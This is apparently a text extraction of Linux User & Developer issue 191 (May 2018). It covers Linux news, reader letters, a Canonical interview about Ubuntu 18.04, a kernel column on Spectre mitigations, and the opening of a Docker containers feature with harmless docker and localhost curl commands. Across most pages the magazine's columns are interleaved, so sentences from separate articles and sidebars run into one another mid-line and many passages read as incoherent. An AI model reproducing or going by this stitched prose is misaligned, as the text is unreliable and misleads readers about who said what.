Linux User & Developer 191 - Control Containers
Linux User & Developer 191 - Control Containers
www.linuxuser.co.uk
3
new ubuntu!
scripting • Perfect configs for Ansible & Puppet
Special report
Pi 3 B+ + expert
projects to try
>S uper-size Pi storage
tutorials
> Git: Master version control
> Make an assistant AI > Arduino: DIY coffee maker
with Mycroft Core > Security: Stop root attacks
Welcome
Future PLC Quay House, The Ambury, Bath BA1 1UA
Editorial
Editor Chris Thornett
[email protected]
01202 442244
Designer Rosie Webber
Production Editor Ed Ricketts
Contributors
Dan Aldred, Joey Bernard, Christian Cawley, John Gowers,
In this issue
Toni Castillo Girona, Jon Masters, Bob Moss, Paul O’Brien,
Mark Pickavance, Calvin Robinson, Mayank Sharma, Alex Smith
Advertising
All contents © 2018 Future Publishing Limited or published under licence. All rights
myfavouritemagazines.co.uk/sublud
the right to edit, amend, adapt all submissions.
Containers
40
32 Ruby is alive and well and Server to Cloud, Containers and Core, 52 Programming: Rust
The venerable language may be 25 to see how it can make your computing life An introduction to systems
years old, but it’s still going strong easier and more secure programming with the ‘safe C’
4
Issue 191
May 2018
facebook.com/LinuxUserUK 94 Free downloads
Twitter: @linuxusermag We’ve uploaded a host of
new free and open source
software this month
86
72
76
74 88
Practical Pi Reviews Back page
72 Pi Project: PipeCam 81 Group test: Security distros 96 Happy Forever Day
Electronics technician Fred Fourie We put four specialised builds that Another intriguing short story
wanted to build an affordable promise enhanced security to the test from sci-fi author Stephen Oram
underwater camera rig using to see which keeps you the safest
inexpensive and easily sourceable
components. His ingenious solution, 86 Reviews: Hardware
PipeCam, involved a Raspberry Pi – How well do the TerraMaster F4-420
and plenty of waterproof sealant NAS and the Trendnet TEW-817DTR
portable wireless router perform?
74 Boot your Pi 3 B+ from USB
You might not know it, but the new 88 Distros: MX Linux 17.1
Pi 3 B+ can be booted from a USB- A joint effort between the antiX and
connected drive rather than an SD MEPIS communities which touts
card. Find out how to set it all up a clean and slick desktop experience
www.linuxuser.co.uk 5
06 News & Opinion | 10 Letters | 12 Interview | 16 Kernel Column
security
6
Distro feed
Top 10
(Average hits per day, 30 days to 6 April 2018)
1. Manjaro 3248
2. Mint 2806
3. Ubuntu 1887
4. Debian 1526
5. elementary 1325
6. Solus 1290
7. MX Linux 1225
8. Fedora 968
9. Zorin 862
Memory leaks have most famously affected usage from 100M to 350M. It does not free it Highlights
browsers in the past, so the idea that a up even if you close all windows. In my 4GB
desktop environment should be subject machine, it means that either I restart every TrueOS
to one of these resource-draining bugs is day or I start facing swap issues the second TrueOS prides itself on being easy to
surprising. But GNOME Shell 3.26.2, which is day”, they said. install, with a graphical installation
most commonly found in Ubuntu 17.10, has Subsequent investigation has proved that system and a good number of pre-configured
a leak that has been spotted by a number of the problem does indeed exist, summarised desktop environments.
users, and reported as a bug. best by developer Georges Basile Stavracas:
It appears the bug is triggered by “I suspect we’re leaking the final buffer OpenBSD
performing actions with an associated somewhere”. He has traced the issue, noting Security-focused, OpenBSD 6.3
animation. Things such as opening the that “something is going on with the Garbage features ISO support in the virtual
overview, minimising windows or simply Collector.” A tool for automatic resource machine daemon, updates to LibreSSL and
switching them can result in a system recovery, Garbage Collection principles have OpenSSH, and SMP for ARM64 systems.
that grinds to a halt after a few hours of been used for over 65 years, so a failure here
use, hitting productivity. That’s not ideal, might be seen as somewhat embarrassing. NetBSD
especially if you’re using a laptop; you can’t Attempting to unpack the issue, Stavracas This popular implementation of the
just reboot your way out of trouble if the reported that after giving up hope, “I found Berkeley Software Distribution is
added load has also drained your battery. a very interesting behavior that I could a lightweight OS designed to work on a wide
Once triggered, RAM use increases minute reproduce […] Triggering garbage collection range of hardware platforms.
by minute. The problem is best illustrated was able to reduce the amount of memory
by launchpad.net user Jesus225: “No used by GNOME Shell to normal levels.”
matter what you do, gnome-shell eats up It’s perhaps surprising that it took so long Latest distros
RAM slowly… After one day of usage (just for the bug to be spotted, but will the fix be available:
web browsing) gnome-shell increased RAM ready in time for Ubuntu 18.04 LTS?
filesilo.co.uk
www.linuxuser.co.uk 7
OpenSource Your source of Linux news & views
gaming
It’s true Steam exactly flying off the shelves… we’re still
working hard on making Linux operating
benefit the Linux ecosystem at large.”
Among these improvements are
Machines aren’t exactly systems a great place for gaming and
applications. We think it will ultimately
investment in the Vulkan graphics API and
shader pre-caching. Steam Machines or not,
flying off the shelves result in a better experience for developers Valve isn’t giving up on Linux just yet.
hardware
Intel discontinues its graphics updater
Many new distros just don’t need it any more
As Linux distributions develop and improve, Tool as of version 2.0.6. The final version 2.0.6 In the case of Ubuntu and Fedora at least,
it isn’t unusual for third-party tools and of the update tool was targeted specifically the inclusion of Intel graphics support in
software to adapt. The Intel Graphics at both Ubuntu 17.04 and Fedora 26. Earlier these distributions (and downstream) means
Update Tool is a good example. Released in revisions for those Linux distributions are no that the update tool is no longer required.
2013 to give Linux users a safe and reliable longer being supported.” With other distros, the case isn’t so clear-
way to install and upgrade to stable drivers Previously known as the Intel Graphics cut. Over the years, many users have relied
and firmware on Intel graphics hardware, five Installer for Linux, the tool was used widely on the Intel graphics support forum for help
years down the line the software has become on systems with Intel graphics. Typically and assistance. This will not immediately
largely redundant. laptops, some desktops and many all-in- close; the blog announced that the forum
The Intel graphics blog announced on ones also rely on Intel graphics. So with the will be maintained for a while, before being
8 March that “users will notice Fedora 27 and update tool put out to pasture, how will you reconfigured as an archive. Users running
Ubuntu 17.10 and beyond are very current. keep your Linux system’s graphics up to older distros and hardware will be hit hardest
Therefore, we are discontinuing the Update date? Is a new laptop or GFX card required? by this, so upgrade wherever possible.
8
distro update
B
efore Pop!_OS, our attention was focused New installer experience
on ensuring our computer hardware ran The new installer is designed with a story arc of artwork
flawlessly with Linux. When the end of Unity that carries you through the installation and permeates
was announced last year, it created a lot of through the operating system. The installer does four
unknowns among the team; but what started as an things: enables us to ship computers with full-disk
unknown quickly became an opportunity. For over 12 encryption; simplifies the installation process; installs
years, we had been outsourcing one of System76’s most extremely fast; and demonstrates the artwork and style
important customer interactions, the desktop experience that will begin to permeate other areas of the operating
– and during this tenure, we collected tons of data: a list system, as seen in the new Pop!_Shop artwork. Carl Richell
of customer requests for an improved desktop interface. Carl is the founder
Linux excels in the fields of computer science, USB flashing utility and CEO of System76,
engineering and DevOps – this is where our customers Popsicle is a new utility that launches when you double- a manufacturer of
live. It’s important for us to make sure we create the click an ISO in the file manager. It is a USB startup disk Linux computers.
most productive computer environment for them to be creator that can flash one or many hundreds of USB
efficient, free and creative. During the first Pop release, drives at once.
we addressed the most common pain-points we heard
from customers with the Linux desktop: the initial user
setup time, bloatware, the need for up-to-date drivers One of the things we’re most grateful
and software, and a fast and functional app center.
Additionally, it was important that Pop!_OS provided for is having such an active Pop!_OS
a pleasant experience for non-System76 customers.
This meant ensuring Pop!_OS was lighter, faster and community providing feedback
more stable than the experience people were used to.
If Pop!_OS can turn unusable machines into working Other new features include a Do Not Disturb switch to
units, this is a win for a maker. It means wider nix notifications, easy HiDPI and standard DPI switching
accessibility, enabling anyone to create a project using for mixed displays or legacy applications, curated
a more powerful desktop interface. applications in the Pop!_Shop with new artwork, and
It’s with the second launch, 18.04, where we really systemd-boot and kernelstub replace GRUB on new
start to make an impact. So what’s different? UEFI installs.
18.04 was a result of maintaining inclusion and
Heightened security collaboration from the Pop!_OS community team,
Pop!_OS encrypts your entire installation by default. working with elementary OS on the new Linux installer
Our new installer also enables full-disk encryption for and, of course, the massive amount of work that occurs
pre-installs that ship from System76 or another OEM. upstream in GNOME, Ubuntu, Debian, the kernel and
System76’s laptops that use Pop!_OS also receive a countless other projects. There was a lot of testing
feature that provides automatic firmware updates, required in order to ensure Pop!_OS was compatible
ensuring the PC is always secure and reliable. across various types of hardware configurations.
One of the things we’re most grateful for is having such
Performance management an active Pop!_OS community, which has been energetic
18.04 includes an improved battery-level indication so in providing feedback. We’d like to continue improving the
users can stay on top of their remaining power. We’ve OS as a tool to enhance your workflow productivity and
also added a CPU and GPU toggle to switch between we always welcome more feedback. So give Pop a try at
power profiles from the system menu, such as NVIDIA https://system76.com/pop and tell us what you need at
Optimus, energy-saving, high-performance and others. www.reddit.com/r/pop_os.
www.linuxuser.co.uk 9
OpenSource Your source of Linux news & views
Comment
Your letters
Questions and opinions about the mag, Linux and open source
Qubes tips imminent. I thought that I would do a fresh install
Dear LU&D, I enjoyed the Qubes OS tutorial in LU&D189 of Qubes 4.0 and downloaded it.
(Features, p60), and thought I would share with you three This version has a similarly uneven progress bar at the
glitches that might put some newcomers off. install stage and after the reboot the side-to-side motion
Firstly, the installer seems to offer no way to overwrite of the second progress bar froze completely. Leaving
a previous OS (in my case, Windows 10) and instead tried the computer for an hour or so when I came back it had
to squeeze the install into some free space. This meant I nonetheless completed its configuration.
had to create a live USB (I used Mint) just to use its Disks The moral again is, don’t panic! Do not assume
program to delete the partitions. Other readers may because the progress gauge freezes that the process has
benefit from planning this in advance. ‘hung’. Have a cuppa or even a meal before giving up!
Having got past that hurdle I felt some newcomers Anyway, many thanks for the tutorial and I hope my
might be perturbed by the uneven progress of the comments might encourage others to persevere with a
installation, which apparently counts files not megabytes, couple of glitches that turn out to be purely cosmetic, and
and thus appears to ‘stall’ while installing large files to reassure them that once installed the default config is
like the templates. The workaround is not to watch too much more reliable than the slightly uneven installer.
closely: trust that the number of files will increment again River Att
if you leave it for twenty or thirty minutes.
After a reboot I had the chance to select optional Chris: Great advice there. Personally, I’ve not
templates, and these took a while to install, with a experienced the problem you mentioned with being
progress bar that travelled from side to side during the unable to overwrite a Windows OS. In Qubes R3.2’s
process. After playing with Qubes and deciding to use it Installation Summary, under the System option you can
seriously, I noted from the tutorial that a new version was select custom partitioning. On the next screen I was able
to choose ‘I will configure partitioning’ and use a manual
Right Keep calm and partitioning GUI to remove existing OS partitions and
install Qubes: good create the required partitions for Qubes OS (as you would
advice from one of do in GParted). However, this may be issue with Windows,
our readers as we’re usually deleting Linux distros when installing.
Regarding 4.0, we were holding on for the RC4 to be
confirmed as the final, but it didn’t come in time for our
disc deadline, unfortunately. It turned out that the project
released an RC5 before going on to full release, so it was
probably the right call. Fortunately, Qubes OS 3.2 is being
supported for a further year after 4’s release, rather
than the usual six months, because of the new hardware
certification requirements for Qubes 4.0. We would
suggest that if you want to follow the tutorial you should
use 3.2, but for general use we’d recommend grabbing
the latest release.
top tweet
MX Linux is an up-and-coming
distro, but this quick straw poll The missing middle
told us that it probably needed a I love your magazine and have read it since I first decided
little profile-raising help. It’s on to try Linux, and bought it with the Ubuntu 16.04 cover
the disc, so try it out! disc to use as my first Linux OS. I’ve now moved away
from Ubuntu and happily swap between (admittedly
10
Facebook: Twitter:
follow us facebook.com/LinuxUserUK @linuxusermag
www.linuxuser.co.uk 11
OpenSource Your source of Linux news & views
Interview canonical
T
he release of Bionic Beaver is important.
Not only is it the LTS – with five years’
worth of support – that will see millions of
users installing Ubuntu for the first time with
GNOME firmly nestled in the desktop environment
slot, but it could be the release that sees Canonical
through IPO. We spoke to the team in early April
about the overall goals for Ubuntu 18.04 LTS.
WILL COOKE: Typically, we find that most of our
users like to install it once, and then leave it alone,
and know that it’ll be looked after itself. That’s more
important in the cloud environment than it is on the
Will Cooke desktop, perhaps. But the joy of Ubuntu is that you
Will is the desktop can do all of [your] development on your machine,
director at Canonical, and then deploy it to the cloud, running the same
who oversees putting the version of Ubuntu, and be safe in the knowledge
desktop ISO together. that the packages that are installed on your desktop
are exactly the same as the ones that are in your
enterprise installation.
When you’ve got thousands of machines deployed
in the cloud in some way, the last thing you want to
be doing is maintaining those every single year and
upgrading it, and dealing with all the fallout that
happens there. So the overarching theme for Ubuntu
18.04 is this ability to develop locally and deploy binaries that work not only on Ubuntu, but also on
to your servers – the public cloud, to your private Fedora or CentOS or Arch.
cloud, whatever you want to do – your servers. But So as an application developer, for example, not
also edge devices, as well. a desktop application necessarily, but it could be
So we’ve made lots of advances in our Ubuntu a web app, it could be anything – you can bundle
David Britton Core products [see p68], which is a really small, up all of those dependencies into a self-continued
David is the engineering cut-down version of Ubuntu, which ships with just package, and then push that out to your various
manager of Ubuntu the bare minimum that you need to bring a device up devices. And you know that it will work, whether they
Server at Canonical. and get it on the network. So the packages that you run Ubuntu or not. That’s a really powerful message
can deploy to your service, to your desktop, can also to developers: do your work on Ubuntu; package it
be deployed to the IoT devices, to the edge devices, up; and push it out to whatever device that is running
Top Right You can try to your network switches. That gives you a really Linux, and you can be reliant on it continuing to work
Communitheme with an early unparalleled ability and reliability to know that the for the next five years.
snap by installing it with snap stuff you’re working on can be packaged up, pushed
install communitheme or wait out to these other devices, and it will continue to What’s the common problem that devs have with
for 18.10. Once installed just work in the same way that it works on your desktop. DEBs and RPMs that has led to the snaps format?
logout out and select it from the A key player in that story is the snap packages WC: There are a few. Packaging DEBs – or RPMs,
cog options that we’ve been working on. These are self-contained for that matter – is a bit of a black art. There’s a
12
Quick guide
Beyond 18.04: GNOME Shell 4
Wayland, the display server protocol, wasn’t a display server crash. For example, if the
stable enough to be the default for Ubuntu display server crashes while you are working
18.04 LTS, but it’s definitely coming and will on a LibreOffice document, there’s a chance
benefit from other technologies that are that it may not be auto-saved, and you’ll
being worked on. As well as PipeWire (for lose all of that work: “At the moment, if the
improving video and audio under Linux), we’re compositor Mutter in the GNOME stack
likely to see an architecture change with crashes in Wayland, it crashes Wayland
GNOME Shell 4. However, things aren’t that and it crashes your entire session. So you’re
simple, as Will Cooke explained: “GNOME thrown back to the login screen, and all of the
Shell 4 shell is a bit of a strange topic. applications that you’re running get killed and
GNOME tell me they have never said there is you’re back in the position of just switching
going to be a GNOME Shell 4. There will be your machine on.”
a GNOME 4 – you know, a new version of all One of the considerations for GNOME 4 is
the libraries and all the applications and all to make a crash play out more like X.Org in
that kind of thing. But they haven’t actually the future: “The display server can restart Above Regardless of the confusion over
committed to doing a whole new shell or and the shell can restart, and all of the GNOME Shell 4’s existence, Canonical
changing the way that it works.” applications will continue running in the seems confident that the new shell will
One of the ideas for GNOME 4 is to background. So you might not even notice bring a change to how Wayland deals with
significantly change the experience during that there was a problem.” display server crashes
certain amount of magic involved in that. And the physically won’t be able to read those files off the
learning process to go through it, to understand how disk. They don’t exist as far as it’s concerned. So
to correctly package something as a DEB or RPM – that, in my mind, are the two key stories. The write-
the barrier to entry is pretty high, there. So snaps once, run-anywhere side of things, and then the
simplify a lot of that. confinement security aspect as well.
Again, part of the fact, really, is this ability to
bundle all the dependencies with it. If you package With snaps, you’ve got a format that allows
your application and you say, “Okay, I depend on proprietary products to come to Linux much more
this version of this library for this architecture,” then easily than before. Do you not feel that there’s a
the dependency resolution might take care of that
for you. It probably would do. But as soon as your
danger that it creates no inclination to actually
open up those products? You can
underlying OS changes that library, for example, then
your package breaks. And you can never be quite
WC: At the end of the day, it’s the users that are
going to choose which application they want. We’ve
do all of your
sure where that package is going to be deployed, and seen a lot of interest in Spotify, for example. It was development
what version of what OS it’s going to end up on. there anyway – we’re just making it a lot easier for
So by bundling all of that into a snap you are people to get their hands on it, and indeed they do on your
absolutely certain that all of your dependencies are
shipped along with your application. So when it gets
want to get their hands on it.
From a pragmatic point of view and from a user-
machine, and
to the other end, it will open and run correctly. friendliness point of view as much as anything, given then deploy it
The other key feature, in my mind, is the security that all of the other tools that you might need…
confinement aspect. X.Org, for example, is a bit long if you’re a web developer [for example], there are to the cloud
in the tooth now. It was never really designed with dozens of IDEs. If what’s stopping you from using
secure computing in mind. If something is running Linux is that you can’t use Skype or something like
as a root, or it’s running as your user, then it has the that, because you have to for work, then absolutely,
permissions of that user that’s running it. let’s solve those user cases and open it up to more
So you can install an application where the dev, and more people.
for example, could go into your home directory, go
into your SSH keys directory, make a copy of those, Going on to talk about aesthetics a little,
and email them off somewhere. It will do that with I wondered how the Ubuntu community theme
the same permissions as the user that’s running (Communitheme) was progressing?
it. And yeah, that’s a real concern. With snaps and WC: It’s going well, yeah. So it’s not quite good
confinements, you can say, “This application, this enough for 18.04. There’s still quite a few bugs that
snap, is not allowed access to those things.” It need fixing, specifically around GTK+ 2 applications.
www.linuxuser.co.uk 13
OpenSource Your source of Linux news & views
Quick guide
Encryption changes
In September 2017, Dustin Kirkland, former anymore; alternatives exist’. “It would be
VP of Product, indicated that Canonical unfair on our users to keep ecryptfs in main
had done a lot of work with Google on ext4 for 18.04,” Cooke confirmed later in an email,
© 2012 eCryptfs.org
encryption with fscrypt. Eventually, he said, “if we cannot be 100% certain that it will be
they planned to depreciate eCryptfs. In fact, supportable for the duration of the LTS life.”
the release of Ubuntu 18.04 sees the removal Ubuntu’s position is that full disk
of eCrypt entirely, along with any option to encryption using Linux Unified Key Setup-
encrypt the home drive in the 18.04 installer. on-disk-format (LUKS) is the preferred
This might sound like a worrying change, method. eCryptfs has been moved from the
but, according to Will Cooke, this was done main repo to universe, if you still want to use Above According to Will Cooke, eCryptfs
because the service is unmaintained – or, it. Currently, Canonical has confirmed that baffled some users: “We had full disk
as the Launchpad bug report elaborates, fscrypt is not considered mature enough to encryption and home directory encryption…
‘Buggy, under-maintained, not fit for main feature in 18.04, but will be a target for 20.04. Why would I want to do one over the other?”
14
top
features
of ubuntu
other applications, and processed and streamed
and all the other kinds of things.
18. 4
That needs those applications to support the
API, and they won’t do that until it’s finished
and is stable. So it’s still relatively early in the
page 58
development cycle of PipeWire. It will probably make
an appearance in 18.10 – certainly 19.04. And then
hopefully, the browsers, for example, will pick up on
it, and integrate support for it into their packages,
and then we’ll be in a good place to leverage it.
NVIDIA doesn’t support some of the APIs that Above Ubuntu 18.04 benefits from GNOME 3.28’s
are required for the Wayland compositors, so is improvements to GNOME Boxes, which makes spinning up
Wayland ever going to reach a level of stability new VMs really simple, albeit with limited options
that’s acceptable for an LTS?
WC: Yes, it will do, I’m pretty sure of that. There feedback that we received from the community,
were some changes in the APIs which meant there was that the old Debian installer was just clunky
was some incompatibility there. But they’re being and hard to navigate. So we’ve spent time over the
addressed. There were known issues, known bugs, past couple of cycles making a new server installer,
and they will be fixed, no doubt about that. based on that feedback. The server installer is
called Subiquity with the Desktop installer called
So there’s no question that NVIDIA is just Ubiquity. That is a new image-based installer that
not interested in Wayland and don’t want to
incorporate –
goes significantly faster than the old package-based
installer. Also, it asks you far fewer questions. Ubuntu-
WC: No, no, they definitely care about that. But
also, we’ve got a really good reputation with NVIDIA
The idea is that it asks you how to configure the
network, how you want to configure your disks, and
Minimal
through their deep-learning AI side of things as well. then install. So that nice ‘just press Enter workflow’ came out of
The deep-learning stack that comes from NVIDIA, through the program takes just a few minutes to get
it’s all built on Ubuntu. So we have a really good through, and you’re done. one of those
relationship with those guys already. And we have
regular calls on these sorts of issues – not only
Moving on to other things that we got feedback
on… one that’s coming up is that networking has
feedback
the massive parallel processing compute side of always been difficult to configure on Ubuntu. It is requests that
things, but also the graphical side of things is being something that is called etc/network/interfaces or
discussed directly with those graphics card vendors ENI, for short. That is a legacy system that spans we did
on a regular basis. So yeah, I have no doubt that multiple generations of Unix in different forms. In
we’re in a good position to be able to get those bugs the modern world, there are two ways to configure
fixed. And they do care. They absolutely do care. networking. One is a NetworkManager that is used
mostly on desktops and IoT devices. The other one
You’ve been also been experimenting with is systemd-network, which is a systemd module for
Zstandard compression. How’s that going? configuring networking, which we are targeting for
DAVID BRITTON: We did some work, this cycle, to the server environment.
bring the latest supported version of Zstandard Since there’s these two different ways to
back to Xenial. There’s also been some talk on the configure it, they have their own little quirks. Ubuntu
APT compression front, offering Zstandard as an is launching in 18.04 a tool called netplan.io. It’s a
alternative to GZIP and XZ compression and the configuration generator. So you type in a very simple
other compression types that are there. And then YAML format – how you want your network to look.
possibly changing that in the 18.10, maybe 19.04 It can be as simple as three lines. It will render the
timeframe, for the default, for APT compression. correct back-end networking data for either the
We were looking at it for 18.04, but it’s just a bit too NetworkManager or systemd-networkd – whichever
early to make that kind of a change. It looks very system you happen to be on. It kind of simplifies the
promising, but it looks more like an 18.10 timeframe way that you can view networking.
where we’ll have that data. One [feature], which is a small thing, but people
clamour for it: htop. Anywhere that Ubuntu Server is
As with the desktop, you also ran a survey for the installed, htop will now be available and supported
server side of things. What responses did you get by Canonical. That is a big one for sysadmins who
from that? have been asking for it for a while. The last one
DB: Ubuntu-Minimal came out of one of those that I wanted to bullet point was LXD 3.0, which is
feedback requests that we did. [Another] bit of Canonical’s supported container solution.
www.linuxuser.co.uk 15
OpenSource Your source of Linux news & views
opinion
L
inus Torvalds has announced Linux 4.16, This culminates in a Release Candidate 1 (RC1) kernel as
noting that things had calmed down it did with 4.17-rc1. The latest kernel is once again fairly
sufficiently at the last minute to avoid the heavy on the security features, including receive-side
need for an RC8 (Release Candidate 8). support for TLS (the kernel now has complete in-kernel
Those things that had remained in flux toward the end TLS support), various additional capabilities in the BPF
were mostly networking-related, and the networking packet filter, and robustness enhancements for mounting
maintainer had explicitly said he was okay with it. The ext4 filesystem images by untrusted users.
4.16 kernel includes a number of new features, among The latter comes with a warning from ext4 filesystem
them AMD’s Secure Encrypted Virtualization (SEV), and maintainer Ted Ts’o. He hopes container folks don’t “hold
Jon Masters many additional mitigations for Meltdown and Spectre any delusions that mounting arbitrary images that can
Jon is a Linux-kernel security vulnerabilities across various architectures. be crafted by malicious attackers should be considered
hacker who has been On the latter point, 4.16 pulled in upstream mitigations sane”. Finally, 4.17 will minimally require GCC 4.5 on x86 –
working on Linux for Spectre variant 1 (bounds-check bypass) exploits. which is true of all Linux distros from the past few years–
for more than 22 These rely upon vulnerable code sequences within the due to a now non-optional feature (Assembly language
years, since he first kernel that attempt to test whether an untrusted value ‘goto’ jump support) dependency.
attended university provided by the user (that is, the application) is within a Perhaps the most interesting development in 4.17, at
at the age of 13. Jon permitted range. least for me, is the removal of support for eight – yes,
lives in Cambridge, Processing of that data should not continue unless eight – different architectures. While Linux prides itself
Massachusetts, and it lies within a desired range, but many processors on being progressive and reasonably swift in adoption
works for a large will speculatively continue execution beyond the of support for the latest hardware, it traditionally has
enterprise Linux check before they have completed the in-bounds test. been less swift in the removal of support for long-dead
vendor, where he is Addressing Spectre variant 1 is currently a matter of software features and hardware devices. There are
driving the creation identifying vulnerable kernel code (through a scanner) many stories over the years of Linux retaining support
of standards for and wrapping it with one of various new macros, such as for hardware that is no longer available, sometimes for
energy-efficient ‘array_index_nospec()’. This prevents speculation beyond amusingly perverse periods of time. In some cases, this
ARM-powered the bounds check in a portable manner. is a great thing since upstream may continue to provide a
servers. At an architectural level, Meltdown mitigation using certain level of support for popular hardware even after
KPTI (Kernel Page Table Isolation) was merged for arm64 the company that built it goes away. But in other cases,
in 4.16, as well as support for Spectre variant 2 mitigation code can ‘bit-rot’ and simply occupy space, consuming
through branch predictor invalidation (via Arm Trusted developer time in unneeded maintenance.
Firmware). s390 (mainframe) gained a second mitigation This was the case with the eight architectures removed
for Spectre variant 2, complementing the existing support in 4.17. Arnd Bergmann had given plenty of notice of
for branch predictor invalidation, using a new concept candidates for removal, ultimately working with the
known as an ‘expoline’. maintainers of blackfin, cris, frv, m32r, metag, mn10300,
While x86 implements ‘retpolines’ (return trampolines) score and tile, to remove them from upstream Linux. Of
that make vulnerable indirect function calls appear to these, it’s likely that few people will have even heard of
be not vulnerable function returns, s390 makes these more than one or two.
indirect calls appear to be execute-type instructions As Arnd put it, “In the end, it seems that while the eight
exposed through the new execute trampolines. architectures are extremely different, they all suffered
the same fate: There was one company in charge of
Heavy on the security an SoC line, a CPU microarchitecture and a software
With the release of 4.16 came the opening of the 4.17 ecosytem, which was more costly than licensing newer
merge window. This is the period of time, typically two off-the-shelf CPU cores from a third party (typically
weeks, during which Linus will pull vetted but potentially ARM, MIPS, or RISC-V). It seems that all the SoC product
disruptive changes and new features into a future kernel. lines are still around, but have not used the custom
16
CPU architectures for several years at this point”. In
order words, the companies remain, but they’re all using
commodity cores at this point.
On a side note, it was recently discovered that support
for (much older) IBM POWER4 systems was accidentally
broken back in 2016. As nobody has complained about
it since then, this support has also been removed
from upstream. Of course, POWER remains a popular
architecture, with great upstream support for all of the
latest POWER8 and POWER9 hardware. Sometimes
even well-maintained architectures benefit from a little
spring-cleaning of older code.
www.linuxuser.co.uk 17
Feature Take control of containers
B
ack in the mists of time, Marc 2018, almost every company needs to be a
Andreessen coined the phrase software company to compete effectively
“Software is eating the world” in within their markets.
an oft-quoted essay he wrote for the Wall There are so many problems that
Street Journal. In 2011 he foresaw that automation can solve for us. For example,
virtualisation and abundant hardware a common issue affecting network
resources would lead to vast data administrators is that different servers
warehouses and increasing systems of across a network can have different
automation that would disrupt how every configurations and different versions
industry across the world works. Now, in of software packages running on them.
Tutorial files
available:
filesilo.co.uk
18
at a glance
Where to find what you’re looking for
• Docker • Script with • More Vagrant • Puppet • Configure
deployments p20 Vagrant p22 providers p24 provisioning p26 Ansible p28
Discover everything Fully automate Extending our Centrally manage web Set up a worthy
that you need to get the creation of automation of virtual applications and keep alternative to Puppet
started with creating, virtual servers and server creation on server configurations and Chef, then use it to
running and managing environments across enterprise platforms synchronised across manage applications
Docker containers different devices, such as Hyper-V and your devices and and configuration files
on web developer machines and OSes VMware vSphere, as well networks with this across machines by
workstations through with the help of a as cloud platforms like established and well- writing your very own
to enterprise servers. scripting language. AWS and Azure. supported tool. playbooks.
Puppet and Ansible can centrally manage fewer bug tickets, more stable production patchy documentation how to successfully
configuration files, package versions and environments and less time spent puzzling install an application. Simply deploy the
scripted deployments so you can tweak out what a mysterious log entry means container on your server and it should work
settings, perform upgrades and roll during a criticial outage. exactly the same way it did for the original
everything back to a ‘known good’ state We’ll also look at Docker. This technology developer, in any environment you choose
across your entire network almost instantly. packages individual applications into a to deploy it in.
Another problem used to be that container that’s far more lightweight than The other great thing about automation,
sysadmins would have to over-provision a virtual machine. This means developers virtualisation and containerisation is
their server resources to allow for peak can spin-up containers without setting up resilience. If a application goes down it
loads and futureproofing. With the an entire development environment, and doesn’t matter, because you can kill it
introduction of cloud computing and and start another
supporting systems to augment on-site one in a matter of
infrastructure, this has become much Developers can spin-up seconds. When your
less of an issue, but making good use of network is under
virtualisation can ensure you make even containers without setting up an peak load you can
better use of existing on-site hardware instantly provision
resources first. entire development environment more virtual servers
We’ll be exploring Vagrant in this feature to cope, then delete
in some depth; it’s a system that can almost all of them
automate the creation, editing, running emulate the network infrastructure and as soon as it troughs.
and deletion of virtual machines across dependent components that their scaled Lastly, we haven’t forgotten those of you
all kinds of different machines and applications will be relying on once those who are just dipping your toes into Linux
virtualisation products. We’ll also cover apps are released. administration for the first time, developers
how it can be used to spin-up environments Sysadmins will also be particularly living under restrictive corporate
that are representative of ‘production’ excited about containerisation because policies, or sysadmins dealing with mixed
on your workstation, so that you can run it means that when developers decide infrastructure containing Windows and
behaviour-driven tests against them. to use technologies that aren’t already Mac servers. All the technologies used
This means you can check that your web supported internally (such as NodeJS, throughout this feature are cross-platform,
applications match customer requirements the Go language, Python 3 and so on), and we’ll even be discussing how to use
and pass all your continuous integration you no longer have to deal with a kind of Vagrant with commercial products such as
tests before you even push your code to ‘dependency hell’ on your existing server VMware vSphere and Microsoft’s Hyper-V
version control. In the long run this means operating systems, or puzzle out from virtualisation technology.
www.linuxuser.co.uk 19
Feature Control Containers
Docker deployments
Package your applications for easy deployment and run them on any system
T
he central premise of Docker is
that you should be able to package
any application once in a
‘container’ and then run it anywhere without
needing to install any extra dependencies.
The project itself was originally released in
2013 as an add-on for the Linux kernel by
Solomon Hykes, who became renowned for
keeping tight control over the way the
product was developed and evolved by the Above Docker Compose makes testing database- Above With one command in the terminal, you
wider community. driven sites with multiple containers easy can have a web server up and ready for testing
The way Docker differs from a standard
virtualisation system, such as Oracle hosted by Docker Inc. In this feature we’ll be ‘mywebsite’ and launches a pre-configured
VirtualBox or VMware Workstation, is that looking at the Community Edition, as anyone container with Nginx (our web server)
it uses the resource-isolation features of – regardless of whether they’re a hobbyist installed. There are two additional flags:
the host Linux kernel rather than just the developer or an in-house IT technician – can -P exposes ports 80 and 443 (HTTP and
virtualisation features of the CPU. As a result, download and use it. Everything we cover HTTPS) from the container and maps them
Docker uses far less memory and processing should also work on the Enterprise Edition. to a new value, so we can call them from the
power, and the individual application The first thing you’ll need to do is localhost domain or the IP address 127.0.0.1.
containers it generates are much smaller install the Docker daemon that tracks the -d runs the image in detached mode, so
and easier to distribute than full-blown containers you launch, and the Docker client the container won’t listen to any further
virtual machines packaged with their full- that launches them in the first place – just terminal input and will keep running until you
sized virtual hard drives. follow the walkthrough below. Once you have specifically choose to destroy it.
There are two versions of Docker: the familiarised yourself with the basics you can You should be able to use the same
Community Edition and the Enterprise try running a simple web server: verification step from the walkthrough below
Edition. Both have the same core to verify that the container has been created
functionality and are licensed under the $ docker run --name mywebsite -P and is running as expected. The local port
Apache License v2, but the latter comes -d nginx mapping will also be listed, so assuming port
with a support contract and the ability to 80 on the container is mapped to 49153, for
run ‘certified’ containers on infrastructure This creates a new docker container called example, you can even see the web server
how to
Set up and use Docker
1 2 3
Install Docker Set up Docker Compose Create a container
Find instructions on how to This is a helpful tool for creating Pull down a new container, verify
configure your package manager applications that span multiple it’s installed and run it with:
and install both the Docker daemon and containers, such as a website that’s split
client app at http://bit.ly/lud_install. If this into a webserver, database and content $ docker pull busybox
doesn’t work you could also try installing hosting components. See http://bit.ly/ $ docker run busybox echo "testing
the binaries from http://bit.ly/lud_binaries. lud_compose for installation details. my container"
20
test page in Mozilla Firefox or from the $ docker run --name website2 -v /
terminal with: var/www:/usr/share/nginx/html:ro -P -d
nginx
$ curl http://localhost:49153
The ro in this line ensures that file contents
However, a web server is only as good as the can only be edited on the host system and
website it’s serving. Currently all we have not by any processes that might be running in
the container.
The other way to do
It uses the resource-isolation this is to define which Above Search for more pre-built containers on
